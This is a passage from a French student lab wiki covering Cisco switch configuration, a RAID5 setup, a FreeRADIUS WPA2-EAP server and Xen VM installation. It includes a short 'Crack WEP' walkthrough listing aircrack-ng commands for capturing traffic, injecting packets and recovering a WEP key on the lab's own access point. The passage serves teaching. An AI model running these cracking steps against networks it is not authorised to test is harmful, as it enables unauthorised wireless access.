 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
